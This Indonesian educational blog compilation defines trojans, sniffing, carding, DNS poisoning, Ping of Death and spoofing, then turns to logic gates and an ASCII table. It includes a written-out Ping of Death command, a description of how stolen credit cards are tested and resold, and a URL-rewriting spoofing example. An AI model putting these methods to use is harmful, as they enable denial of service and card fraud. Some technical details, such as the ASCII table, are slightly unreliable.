Trojan masuk melalui dua bagian, yaitu bagian client dan server. Jadi hacker kadang harus berjalan menanamkan trojannya di komputer korban ataupun memancing agar sang korban mengeksekusi/membuka file yang mengandung Trojan, namun ada juga Trojan yang langsung menginfeksi korbannya hanya dengan berbekal ip korban misalnya Kaht. Ketika korban (tanpa diketahui) menjalankan file yang mengandung Trojan pada komputernya, kemudian penyerang akan menggunakan client untuk koneksi dengan server dan mulai menggunakan trojan. Protokol TCP/IP adalah jenis protokol yang umum digunakan untuk komunikasi. Trojan dapat bekerja dengan baik dengan jenis protokol ini, tetapi beberapa trojan juga dapat menggunakan protokol UDP dengan baik. Ketika server mulai dijalankan (pada komputer korban), Trojan umumnya mencoba untuk menyembunyikan diri di suatu tempat dalam sistem komputer tersebut, kemudian mulai membuka beberapa port untuk melakukan koneksi, memodifikasi registry dan atau menggunakan metode lain yaitu metode autostarting agar trojan menjadi otomatis aktif saat komputer dihidupkan. Trojan sangat berbahaya bagi pengguna komputer yang tersambung jaringan komputer atau internet, karena bisa jadi hacker bisa mencuri data-data sensitif misalnya password email, dial-up passwords, webservices passwords, e-mail address, dokumen pekerjaan, internet banking, paypal, e-gold,kartu kredit dan lain-lain.
 Cara mengatasi bahaya Trojan

Pertama lakukan langkah pendeteksian keberadaan Trojan pada komputer. Pendeteksian Trojan dapat dilakukan dengan cara-cara sebagai berikut
1. Task List
Pendeteksiannya dengan melihat daftar program yang sedang berjalan dalam task list. Daftar dapat ditampilkan dengan menekan tombol CTRL+ALT+DEL atau klik kanan pada toolbar lalu klik task manager. Selain dapat mengetahui program yang berjalan, pemakai dapat melakukan penghentian terhadap suatu program yang dianggap aneh dan mencurigakan.
Namun beberapa Trojan tetap mampu menyembunyikan dari task list ini. Sehingga untuk mengetahui secara program yang berjalan secara keseluruhan perlu dibuka System Information Utility(msinfo32.exe) yang berada di C:\Program files\common files\microsoft shared\msinfo. Tool ini dapat melihat semua proses itu sedang berjalan, baik yang tersembunyi dari task list maupun tidak. Hal-hal yang perlu diperiksa adalah path, nama file, properti file dan berjalannya file *.exe serta file *.dll.

2. Netstat
Semua Trojan membutuhkan komunikasi. Jika mereka tidak melakukan komunikasi berarti tujuannya sia-sia. Hal ini adalah kelemahan yang utama dari Trojan, dengan komunikasi berarti mereka meninggalkan jejak yang kemudian dapat ditelusuri. Perintah Netstat berfungsi membuka koneksi ke dan dari komputer seseorang. Jika perintah ini dijalankan maka akan menampilkan IP address dari komputer tersebut dan komputer yang terkoneksi dengannya. Jika ditemukan IP address yang tidak dikenal maka perlu diselidiki lebih lanjut, mengejar dan menangkapnya.

3. TCP View
TCPVIEW adalah suatu free utility dari Sysinternals yang mempunyai kemampuan
menampilkan IP address dan menampilkan program yang digunakan oleh orang lain untuk koneksi dengan komputer pemakai. Dengan menggunakan informasi tersebut, maka jika terjadi penyerangan dapat diketahui dan dapat melakukan serangan balik. Langkah penghapusan Trojan Trojan dapat dihapus dengan: Menggunakan Software Anti-Virus. Sebagian antivirus dapat digunakan untuk mengenali dan menghapus Trojan. Menggunakan Software Trojan Scanner, software yang di khususkan untuk mendeteksi dan menghapus Trojan Cara yang paling sadis yah diinstal ulang komputernya.

Langkah pencegahan Trojan
Trojan menyusup di komputer anda, pastikan anda memasang antivirus yang selalu terupdate,
mengaktifkan Firewall baik bawaan dari Windows atau dari luar. Selalu waspadalah
jika komputer anda mengalami sesuatu kejanggalan. Hindari penggunaan sofware ilegal
karena sering tanpa kita sadari software tersebut mengandung Trojan, downloadlah software
dari situs-situs yang benar-benar dapat dipercaya.

Sumber : http://poutry9.blogspot.com/2012/12/pengertian-virus-trojan-horse.html

Pengertian Sniffer

Sniffer adalah program yang membaca dan menganalisa setiap protokol yang melewati mesin di mana program tersebut diinstal. Secara default, sebuah komputer dalam jaringan (workstation) hanya mendengarkan dan merespon paket-paket yang dikirimkan kepada mereka. Namun demikian, kartu jaringan (network card) dapat diset oleh beberapa program tertentu, sehingga dapat memonitor dan menangkap semua lalu lintas jaringan yang lewat tanpa peduli kepada siapa paket tersebut dikirimkan. Aktifitasnya biasa disebut dengan sniffing.

Untuk dapat membaca dan menganalisa setiap protokol yang melewati mesin, diperlukan program yang bisa membelokkan paket ke komputer attaker. Biasa disebut serangan spoofing. Attaker akan bertindak sebagai Man-In-the-Middle (MIM).

Gambar di atas mengilustrasikan koneksi TCP yang sebenarnya, tanpa ada sebuah host yang bertindak sebagai MIM. Kemudian host attacker menjalankan program Spoofing, berarti host attacker akan bertindak sebagai host yang dilewati data antara host client dan host server.

Setelah host attacker menjadi host yang berada di tengah-tengah dari dua host yang saling berkomunikasi, kemudian attacker melakukan analisa traffic dengan menjalankan program ethereal. Dengan menganalisa traffic TCP yang sudah tercapture, attacker dapat mengetahui apa saja yang dilakukan oleh host client terhadap host server.
 Sumber : http://badaiardiat.blogspot.com/2011/02/pengertian-sniffer.html

Pengertian Carding

Carding adalah istilah yang digunakan untuk proses verifikasi keabsahan data kartu kredit yang dicuri oleh carder. Pencuri memberi informasi kartu pada situs Web yang memiliki real-time proses transaksi. Jika kartu berhasil diproses, pencuri tahu bahwa kartu masih bisa digunakan. Item spesifik yang dibeli dengan kartu kredit yang dicuri biasanya tidak penting, dan pencuri tidak perlu membeli produk riil, biasanya digunakan untuk mendaftar member sebuah situs web atau sumbangan amal. Pembelian biasanya hanya dalam jumlah uang kecil, baik untuk menghindari penggunaan batas kartu kredit, dan juga untuk menghindari kecurigaan  penerbit dan pemilik kartu kredit. Sebuah situs web yang diketahui rentan terhadap carding dikenal sebagai website cardable.

Di masa lalu, carders menggunakan program komputer yang disebut "generator" untuk menghasilkan urutan nomor kartu kredit secara acak, dan kemudian menguji mereka untuk melihat yang account yang valid. Variasi lainnya akan mengambil nomor kartu palsu untuk sebuah lokasi yang tidak segera memproses nomor kartu, seperti pameran dagang atau peristiwa khusus. Namun, proses ini tidak lagi layak karena persyaratan luas oleh sistem kartu internet kredit pengolahan untuk data tambahan seperti alamat penagihan, 3 sampai 4 Kode Keamanan Kartu digit dan / atau tanggal kedaluwarsa kartu, serta penggunaan lebih umum scanner kartu nirkabel yang dapat memproses transaksi langsung. Saat ini, carding lebih biasanya digunakan untuk memverifikasi data kartu kredit yang diperoleh secara langsung dari korban dengan skimming atau phishing..

Satu set rincian kartu kredit yang telah diverifikasi dengan cara ini dikenal di kalangan penipuan sebagai suatu phish. Sebuah carder biasanya akan menjual file data phish untuk orang lain yang akan melakukan penipuan aktual. Harga pasar untuk phish berkisar dari US $ 1,00 menjadi US $ 50,00 tergantung pada jenis kartu, kebaruan data dan status kredit korban

sumber : http://bsicardingblog.blogspot.com/2011/11/pengertian-carding.html

Pengertian DNS Poisoning

DNS Poisoning adalah salah satu kesalahan dalam melakukan domain resolving yang diakibatkan oleh malicious application (malware,virus,worm) atau juga kesalahan aplikasi dalam konfigurasi name server, sehingga menyebabkan internet tidak bisa diakses secara normal karena permintaan resolve akan di rubah dan user akan di redirect menuju situs yang berbeda dengan situs yang sebenarnya , jika di dalam jaringan kita terkena DNS poisoning maka dapat diketahui dengan cara melakukan nslookup dan melihat authoritative DNS yang memberikan jawaban atas permintaan domain resolve, jika tidak sesuai dengan name server yang di berikan oleh ISP maka berhati-hatilah mungkin kita terkena DNS poisoning.

Bagaimana cara ataupun metode untuk mengatasi DNS Poisoning?

Ada beberapa cara untuk terhindar dari DNS Poisoning, seperti:

1. Melakukan monitoring port – port komputer yang terbuka dan analisis IP misalnya dengan IP server alamat web tujuan. Windows telah menyediakan sarana monitoring ini. Untuk mengetahui kemana saja statistik hubungan network (jaringan), dapat menggunakan perintah netstat, salah satu caranya dengan net stat-n, lalu lihat layar (netstat-n) untuk mengetahui IP alamat web tujuan dan port yang digunakan.

2. Menggunakan firewall untuk mendeteksi koneksi ke dan dari komputer. Sekalipun terkadang firewall melakukan konfirmasi yang lama setiap kali komputer melakukan koneksi baru, tetapi hal ini merupakan proses yang harus dilalui jika ingin mendapatkan pengamanan optimal.

3. Monitor file host pada komputer, lokasi host ada di c:\windows\system 32\drivers\etc\hosts. Menggunakan notepad untuk membuka dan melihat isi file hosts.

Sumber : http://di22th.blogspot.com/2009/11/apr-dan-dns-poisoning.html

Pengertian Ping of Death

Ping of Death adalah jenis serangan yang menggunakan utility ping yang terdapat pada sistem operasi komputer. Ping ini digunakan untuk mengecek waktu yang aka diperlukan untuk mengirim data tertentu dari satu komputer ke komputer lainnnya. Panjang maksimum data menurut TCP protokol IP adalah 65,536  byte.

Selain itu, paket serangan Ping of Death dapat dengan mudah dispoof atau direkayasa sehingga tidak bisa  diketahui asal sesungguhnya dari mana, dan penyerangnya hanya perlu mengetahui alamat IP dari komputer yang diserangnya.Penyerang dapat mengirimkan berbagai paket ICMP yang terfragmentasi sehingga waktu paket-paket tersebut disatukan kembali, maka ukuran paket seluruhnya melebihi batas 65536 byte. Contoh sederhananya sebagai berikut:

C:\windows>ping -l 65540

Perintah MSDOS di atas melakukan ping atau pengiriman paket ICMP berukuran 65540 byte ke suatu host/server. Pada jenis serangan tersebut, data yang akan dikirim melebihi panjang maksimal yang disediakan. Jika sistem tidak siap saat penerimaan data, maka sistem akan hang, crash, atau reboot.


Sumber : http://tandtechno.blogspot.com/2011/05/pengertian-ping-of-death.html

Pengertian Spoofing

Spoofing adalah “ Teknik yang digunakan untuk memperoleh akses yang tidak sah ke suatu komputer atau informasi, dimana penyerang berhubungan dengan pengguna dengan berpura-pura memalsukan bahwa mereka adalah host yang dapat dipercaya” hal ini biasanya dilakukan oleh seorang hacker/ cracker.

Macam-Macam Spoofing
  • IP-Spoofing adalah serangan teknis yang rumit yant terdiri dari beberapa komponen. Ini adalah eksploitasi keamanan yang bekerja dengan menipu komputer dalam hubungan kepercayaan bahwa anda adalah orang lain. Terdapat banyak makalah ditulis oleh daemon9, route, dan infinity di Volume Seven, Issue Fourty-Eight majalah Phrack.
  • DNS spoofing adalah mengambil nama DNS dari sistem lain dengan membahayakan domain name server suatu domain yang sah.
  • Identify Spoofing adalah suatu tindakan penyusupan dengan menggunakan identitas resmi secara ilegal. Dengan menggunakan identitas tersebut, penyusup akan dapat mengakses segala sesuatu dalam jaringan.

Contoh Web Spoofing
Web Spoofing melibatkan sebuah server web yang dimiliki penyerang yang diletakkan pada internet antara pengguna dengan WWW, sehingga akses ke web yang dituju pengguna akan melalui server penyerang. Cara seperti ini dikenal dengan sebutan “man in the middle attack” [2,5]. Hal ini dapat terjadi dengan beberapa jalan, tapi yang paling mungkin adalah :
  • Akses ke situs web diarahkan melalui sebuah proxy server : ini disebut (HTTP) application proxy. Hal ini memberikan pengelolaan jaringan yang lebih baik untuk akses ke server. Ini merupakan teknik yang cukup baik yang digunakan pada banyak situs-situs di internet, akan tetapi teknik ini tidak mencegah Web Spoofing.
  • Seseorang menaruh link yang palsu (yang sudah di-hack) pada halaman web yang populer.
  • Kita menggunakan search engine (mesin pencari, seperti Yahoo, Alta Vista, Goggle) untuk mendapatkan link dari topik yang ingin dicari. Tanpa kita ketahui, beberapa dari link ini telah diletakkan oleh hacker yang berpura-pura menjadi orang lain. Seperti, pencarian untuk situs bank memberikan salah satu hasil http://www.kilkbca..com, sayangnya kita mungkin tidak mengetahui bahwa URL sebenarnya dari Bank BCA adalah http://www.klikbca.com
Kita menggunakan browser mengakses sebuah Web. Semua yang ada pada NET (baik Internet maupun Intranet) direferensikan dengan Universal Resource Locator (URL). Pertama-tama penyerang harus menulis-ulang URL dari halaman web yang dituju sehingga mereka mengacu ke server yang dimiliki penyerang daripada ke server web yang sebenarnya. Misalnya, server penyerang terletak di www.attacker.com, maka penyerang akan menulis-ulang URL dengan menambahkan http://www.attacker.com didepan URL yang asli. 

Sumber : http://54tr10.blogspot.com/2012/03/pengertian-spoofing.html

Keamanan jaringan

Keamanan jaringan (Bahasa Inggris: Network Security) dalam jaringan komputer sangat penting dilakukan untuk memonitor akses jaringan dan mencegah penyalahgunaan sumber daya jaringan yang tidak sah. Tugas keamanan jaringan dikontrol oleh administrator jaringan.

Segi-segi keamanan didefinisikan dari kelima point ini. 
a. Confidentiality Mensyaratkan bahwa informasi (data) hanya bisa diakses oleh pihak yang memiliki wewenang. 
b. Integrity Mensyaratkan bahwa informasi hanya dapat diubah oleh pihak yang memiliki wewenang. 
c. Availability Mensyaratkan bahwa informasi tersedia untuk pihak yang memiliki wewenang ketika dibutuhkan. 
d. Authentication Mensyaratkan bahwa pengirim suatu informasi dapat diidentifikasi dengan benar dan ada jaminan bahwa identitas yang didapat tidak palsu. 
e. Nonrepudiation Mensyaratkan bahwa baik pengirim maupun penerima informasi tidak dapat menyangkal pengiriman dan penerimaan pesan.

Serangan (gangguan) terhadap keamanan dapat dikategorikan dalam empat kategori utama : 
a. Interruption Suatu aset dari suatu sistem diserang sehingga menjadi tidak tersedia atau tidak dapat dipakai oleh yang berwenang. Contohnya adalah perusakan/modifikasi terhadap piranti keras atau saluran jaringan. b. Interception Suatu pihak yang tidak berwenang mendapatkan akses pada suatu aset. Pihak yang dimaksud bisa berupa orang, program, atau sistem yang lain. Contohnya adalah penyadapan terhadap data dalam suatu jaringan. 
c. Modification Suatu pihak yang tidak berwenang dapat melakukan perubahan terhadap suatu aset. Contohnya adalah perubahan nilai pada file data, modifikasi program sehingga berjalan dengan tidak semestinya, dan modifikasi pesan yang sedang ditransmisikan dalam jaringan. 
d. Fabrication Suatu pihak yang tidak berwenang menyisipkan objek palsu ke dalam sistem. Contohnya adalah pengiriman pesan palsu kepada orang lain.

Ada beberapa prinsip yang perlu dihindari dalam menangani masalah keamanan :  diam dan semua akan baik-baik saja sembunyi dan mereka tidak akan dapat menemukan anda teknologi yang digunakan kompleks/rumit, artinya aman


Sumber : http://id.wikipedia.org/wiki/Keamanan_jaringan

Gerbang Logika

Gerbang Logika adalah rangkaian dengan satu atau lebih dari satu sinyal masukan tetapi hanya menghasilkan satu sinyal berupa tegangan tinggi atau tegangan rendah. Dikarenakan analisis gerbang logika dilakukan dengan Aljabar Boolean maka gerbang logika sering juga disebut Rangkaian logika.

GERBANG NOT
     Gerbang NOT atau juga bisa disebut dengan pembalik (inverter) memiliki fungsi membalik logika tegangan inputnya pada outputnya. Sebuah inverter (pembalik) adalah gerbang dengan satu sinyal masukan dan satu sinyal keluaran dimana keadaan keluaranya selalu berlawanan dengan keadaan masukan. Membalik dalam hal ini adalah mengubah menjadi lawannya. Karena dalam logika tegangan hanya ada dua kondisi yaitu tinggi dan rendah atau “1” dan “0”, maka membalik logika tegangan berarti mengubah “1” menjadi "0” atau sebaliknya mengubah nol menjadi satu. Simbul atau tanda gambar pintu NOTditunjukkan pada gambar dibawah ini.

GERBANG AND
     Gerbang AND (AND GATE) atau dapat pula disebut gate AND ,adalah suatu rangkaian logika yang mempunyai beberapa jalan masuk (input) dan hanya mempunyai satu jalan keluar (output). Gerbang AND mempunyai dua atau lebih dari dua sinyal masukan tetapi hanya satu sinyal keluaran. Dalam gerbang AND, untuk menghasilkan sinyal keluaran tinggi maka semua sinyal masukan harus bernilai tinggi.


GERBANG OR
     Gerbang OR berbeda dengan gerbang NOT yang hanya memiliki satu input, gerbang ini memiliki paling sedikit 2 jalur input. Artinya inputnya bisa lebih dari dua, misalnya empat atau delapan. Yang jelas adalah semua gerbang logika selalu mempunyai hanya satu output. Gerbang OR akan memberikan sinyal keluaran tinggi jika salah satu atau semua sinyal masukan bernilai tinggi, sehingga dapat dikatakan bahwa gerbang OR hanya memiliki sinyal keluaran rendah jika semua sinyal masukan bernilai rendah.


GERBANG NAND
     Gerbang NANDadalah suatu NOT-AND, atau suatu fungsi AND yang dibalikkan. Dengan kata lain bahwa gerbang NAND akan menghasilkan sinyal keluaran rendah jika semua sinyal masukan bernilai tinggi.


GERBANG NOR
      Gerbang NOR adalah suatu NOT-OR, atau suatu fungsi OR yang dibalikkan sehingga dapat dikatakan bahwa gerbang NOR akan menghasilkan sinyal keluaran tinggi jika semua sinyal masukanya bernilai rendah.


GERBANG XOR
     Gerbang X-OR akan menghasilkan sinyal keluaran rendah jika semua sinyal masukan bernilai rendah atau semua masukan bernilai tinggi atau dengan kata lain bahwa X-OR akan menghasilkan sinyal keluaran rendah jika sinyal masukan bernilai sama semua.


GERBANG XNOR
              Gerbang X-NOR akan menghasilkan sinyal keluaran tinggi jika semua sinyal masukan bernilai sama (kebalikan dari gerbang X-OR).

Kode ASCII

Kode Standar Amerika untuk Pertukaran Informasi atau ASCII (American Standard Code for Information Interchange) merupakan suatu standar internasional dalam kode huruf dan simbol seperti Hex dan Unicode tetapi ASCII lebih bersifat universal, contohnya 124 adalah untuk karakter "|".

Ia selalu digunakan oleh komputer dan alat komunikasi lain untuk menunjukkan teks. Kode ASCII sebenarnya memiliki komposisi bilangan biner sebanyak 8 bit. Dimulai dari 00000000 hingga 11111111. Total kombinasi yang dihasilkan sebanyak 256, dimulai dari kode 0 hingga 255 dalam sistem bilangan Desimal.



Karakter Nilai Unicode
(heksadesimal)
Nilai ANSI ASCII
(desimal)
Keterangan
NUL 0000 0 Null (tidak tampak)
SOH 0001 1 Start of heading (tidak tampak)
STX 0002 2 Start of text (tidak tampak)
ETX 0003 3 End of text (tidak tampak)
EOT 0004 4 End of transmission (tidak tampak)
ENQ 0005 5 Enquiry (tidak tampak)
ACK 0006 6 Acknowledge (tidak tampak)
BEL 0007 7 Bell (tidak tampak)
BS 0008 8 Menghapus satu karakter di belakang kursor (Backspace)
HT 0009 9 Horizontal tabulation
LF 000A 10 Pergantian baris (Line feed)
VT 000B 11 Tabulasi vertikal
FF 000C 12 Pergantian baris (Form feed)
CR 000D 13 Pergantian baris (carriage return)
SO 000E 14 Shift out (tidak tampak)
SI 000F 15 Shift in (tidak tampak)
DLE 0010 16 Data link escape (tidak tampak)
DC1 0011 17 Device control 1 (tidak tampak)
DC2 0012 18 Device control 2 (tidak tampak)
DC3 0013 19 Device control 3 (tidak tampak)
DC4 0014 20 Device control 4 (tidak tampak)
NAK 0015 21 Negative acknowledge (tidak tampak)
SYN 0016 22 Synchronous idle (tidak tampak)
ETB 0017 23 End of transmission block (tidak tampak)
CAN 0018 24 Cancel (tidak tampak)
EM 0019 25 End of medium (tidak tampak)
SUB 001A 26 Substitute (tidak tampak)
ESC 001B 27 Escape (tidak tampak)
FS 001C 28 File separator
GS 001D 29 Group separator
RS 001E 30 Record separator
US 001F 31 Unit separator
SP 0020 32 Spasi
! 0021 33 Tanda seru (exclamation)
" 0022 34 Tanda kutip dua
# 0023 35 Tanda pagar (kres)
$ 0024 36 Tanda mata uang dolar
% 0025 37 Tanda persen
& 0026 38 Karakter ampersand (&)
0027 39 Karakter Apostrof
( 0028 40 Tanda kurung buka
) 0029 41 Tanda kurung tutup
* 002A 42 Karakter asterisk (bintang)
+ 002B 43 Tanda tambah (plus)
, 002C 44 Karakter koma
- 002D 45 Karakter hyphen (strip)
. 002E 46 Tanda titik
/ 002F 47 Garis miring (slash)
0 0030 48 Angka nol
1 0031 49 Angka satu
2 0032 50 Angka dua
3 0033 51 Angka tiga
4 0034 52 Angka empat
5 0035 53 Angka lima
6 0036 54 Angka enam
7 0037 55 Angka tujuh
8 0038 56 Angka delapan
9 0039 57 Angka sembilan
: 003A 58 Tanda titik dua
; 003B 59 Tanda titik koma
< 003C 60 Tanda lebih kecil
= 003D 61 Tanda sama dengan
> 003E 62 Tanda lebih besar
? 003F 63 Tanda tanya
@ 0040 64 A keong (@)
A 0041 65 Huruf latin A kapital
B 0042 66 Huruf latin B kapital
C 0043 67 Huruf latin C kapital
D 0044 68 Huruf latin D kapital
E 0045 69 Huruf latin E kapital
F 0046 70 Huruf latin F kapital
G 0047 71 Huruf latin G kapital
H 0048 72 Huruf latin H kapital
I 0049 73 Huruf latin I kapital
J 004A 74 Huruf latin J kapital
K 004B 75 Huruf latin K kapital
L 004C 76 Huruf latin L kapital
M 004D 77 Huruf latin M kapital
N 004E 78 Huruf latin N kapital
O 004F 79 Huruf latin O kapital
P 0050 80 Huruf latin P kapital
Q 0051 81 Huruf latin Q kapital
R 0052 82 Huruf latin R kapital
S 0053 83 Huruf latin S kapital
T 0054 84 Huruf latin T kapital
U 0055 85 Huruf latin U kapital
V 0056 86 Huruf latin V kapital
W 0057 87 Huruf latin W kapital
X 0058 88 Huruf latin X kapital
Y 0059 89 Huruf latin Y kapital
Z 005A 90 Huruf latin Z kapital
[ 005B 91 Kurung siku kiri
\ 005C 92 Garis miring terbalik (backslash)
] 005D 93 Kurung sikur kanan
^ 005E 94 Tanda pangkat
_ 005F 95 Garis bawah (underscore)
` 0060 96 Tanda petik satu
a 0061 97 Huruf latin a kecil
b 0062 98 Huruf latin b kecil
c 0063 99 Huruf latin c kecil
d 0064 100 Huruf latin d kecil
e 0065 101 Huruf latin e kecil
f 0066 102 Huruf latin f kecil f
g 0067 103 Huruf latin g kecil
h 0068 104 Huruf latin h kecil
i 0069 105 Huruf latin i kecil
j 006A 106 Huruf latin j kecil
k 006B 107 Huruf latin k kecil
l 006C 108 Huruf latin l kecil
m 006D 109 Huruf latin m kecil
n 006E 110 Huruf latin n kecil
o 006F 111 Huruf latin o kecil
p 0070 112 Huruf latin p kecil
q 0071 113 Huruf latin q kecil
r 0072 114 Huruf latin r kecil
s 0073 115 Huruf latin s kecil
t 0074 116 Huruf latin t kecil
u 0075 117 Huruf latin u kecil
v 0076 118 Huruf latin v kecil
w 0077 119 Huruf latin w kecil
x 0078 120 Huruf latin x kecil
y 0079 121 Huruf latin y kecil
z 007A 122 Huruf latin z kecil
{ 007B 123 Kurung kurawal buka
¦ 007C 124 Garis vertikal (pipa)
} 007D 125 Kurung kurawal tutup
~ 007E 126 Karakter gelombang (tilde)
DEL 007F 127 Delete

0080 128 Dicadangkan

0081 129 Dicadangkan

0082 130 Dicadangkan

0083 131 Dicadangkan
IND 0084 132 Index
NEL 0085 133 Next line
SSA 0086 134 Start of selected area
ESA 0087 135 End of selected area

0088 136 Character tabulation set

0089 137 Character tabulation with justification

008A 138 Line tabulation set
PLD 008B 139 Partial line down
PLU 008C 140 Partial line up

008D 141 Reverse line feed
SS2 008E 142 Single shift two
SS3 008F 143 Single shift three
DCS 0090 144 Device control string
PU1 0091 145 Private use one
PU2 0092 146 Private use two
STS 0093 147 Set transmit state
CCH 0094 148 Cancel character
MW 0095 149 Message waiting

0096 150 Start of guarded area

0097 151 End of guarded area

0098 152 Start of string

0099 153 Dicadangkan

009A 154 Single character introducer
CSI 009B 155 Control sequence introducer
ST 009C 156 String terminator
OSC 009D 157 Operating system command
PM 009E 158 Privacy message
APC 009F 158 Application program command

00A0 160 Spasi yang bukan pemisah kata
¡ 00A1 161 Tanda seru terbalik
¢ 00A2 162 Tanda sen (Cent)
£ 00A3 163 Tanda Poundsterling
¤ 00A4 164 Tanda mata uang (Currency)
¥ 00A5 165 Tanda Yen
¦ 00A6 166 Garis tegak putus-putus (broken bar)
§ 00A7 167 Section sign
¨ 00A8 168 Diaeresis
© 00A9 169 Tanda hak cipta (Copyright)
ª 00AA 170 Feminine ordinal indicator
« 00AB 171 Left-pointing double angle quotation mark
¬ 00AC 172 Not sign
­ 00AD 173 Tanda strip (hyphen)
® 00AE 174 Tanda merk terdaftar
¯ 00AF 175 Macron
° 00B0 176 Tanda derajat
± 00B1 177 Tanda kurang lebih (plus-minus)
² 00B2 178 Tanda kuadrat (pangkat dua)
³ 00B3 179 Tanda kubik (pangkat tiga)
´ 00B4 180 Acute accent
µ 00B5 181 Micro sign
00B6 182 Pilcrow sign
· 00B7 183 Middle dot
 
Terima kasih disampaikan telah berkunjung ke halaman ini, Mari belajar bersama.... Sharing ilmu atau pun yang lain bersama agar bermanfaat bagi yang lain...:) MUHAMMAD NUR ROHMAN